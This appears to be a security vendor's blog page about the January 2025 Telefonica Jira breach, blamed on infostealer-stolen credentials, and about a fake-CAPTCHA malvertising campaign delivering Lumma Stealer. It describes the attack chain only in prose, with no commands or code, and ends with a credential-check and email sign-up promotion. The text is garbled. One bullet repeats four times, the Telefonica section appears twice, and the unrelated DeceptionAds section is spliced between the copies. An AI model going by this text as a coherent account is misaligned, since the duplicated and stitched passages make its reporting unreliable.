Spanish telecommunications giant Telefonica recently fell victim to a significant cybersecurity breach, showing that even large organizations can be vulnerable. The event highlights how important it is to maintain strong defenses, especially against infostealers, which are designed specifically to steal information.

The Breach: What Happened?

This month (January 2025), Telefonica confirmed unauthorized access to its internal Jira ticketing system. The breach, orchestrated by a group of attackers allegedly linked to the Hellcat ransomware group, resulted in the theft of approximately 2.3 GB of sensitive data. The stolen information included:

• 24,000 employee emails and names
• 500,000 Jira issues and summaries
• 5,000 internal documents
• 236,493 lines of customer data

The Attack Vector: Infostealer Malware

The breach was facilitated by infostealer malware, a type of malicious software designed to harvest sensitive information such as login credentials from infected devices. Numerous employees were reported to be compromised, providing attackers with critical credentials for initial access

• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.

Cybercriminals have released a massive malvertising campaign that’s tricking users with fake CAPTCHA pages. The operation, dubbed “DeceptionAds” by security researchers, is distributing Lumma Stealer malware at an alarming rate. We’re talking over a million daily ad impressions across more than 3,000 websites. That’s a lot of potential victims.

Beware: DeceptionAds campaign using fake CAPTCHAs to spread Lumma Stealer malware across thousands of websites daily.

Here’s how it works. Users see what looks like a normal ad. They click. Suddenly, they’re redirected to a fake CAPTCHA page. But instead of the usual “I’m not a robot” checkbox, they’re instructed to copy and paste a command into their Windows Run dialog. Sneaky JavaScript automatically copies an obfuscated PowerShell command to their clipboard. One paste later, and boom—they’ve downloaded Lumma Stealer. The campaign leverages Monetag ad scripts to distribute these fake CAPTCHA pages at massive scale. A real-world infection timeline shows victims can go from searching for common software to complete system compromise in under a minute.

The malware is nasty. It grabs passwords, cookies, browser data. It hunts for cryptocurrency wallets and financial information. It even searches files for specific keywords that might indicate valuable data. This type of attack exemplifies how exploit kits target vulnerable browsers to deliver infostealer malware. And once it’s done collecting your digital life, it sends everything to command-and-control servers using “.shop” domains.

The technical aspects are pretty sophisticated. The PowerShell script contains an AES-encrypted payload with a hardcoded decryption key. It downloads two zip files and executes the Lumma Stealer executable. All this happens behind the scenes while users think they’re just completing a CAPTCHA.

Security researchers believe the “Vane Viper” threat actor is behind this campaign. They’re known for exploiting weaknesses in digital advertising ecosystems. They use BeMob cloaking services to evade detection and Cloudflare CDN for payload delivery.

The evasion techniques are impressive, if not infuriating. Obfuscated code, base64 encoding, legitimate ad networks as cover. They’re constantly updating their malicious pages with new variants.

Run a free live test to check if any of your organization’s credentials have been compromised

Spanish telecommunications giant Telefonica recently fell victim to a significant cybersecurity breach, showing that even large organizations can be vulnerable. The event highlights how important it is to maintain strong defenses, especially against infostealers, which are designed specifically to steal information.

The Breach: What Happened?

This month (January 2025), Telefonica confirmed unauthorized access to its internal Jira ticketing system. The breach, orchestrated by a group of attackers allegedly linked to the Hellcat ransomware group, resulted in the theft of approximately 2.3 GB of sensitive data. The stolen information included:

• 24,000 employee emails and names
• 500,000 Jira issues and summaries
• 5,000 internal documents
• 236,493 lines of customer data

The Attack Vector: Infostealer Malware

The breach was facilitated by infostealer malware, a type of malicious software designed to harvest sensitive information such as login credentials from infected devices. Numerous employees were reported to be compromised, providing attackers with critical credentials for initial access

• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.
• 469 employee credentials on Telefonica’s domain were compromised.

Leave your email and get critical updates and alerts from Twilight Cyber straight to your inbox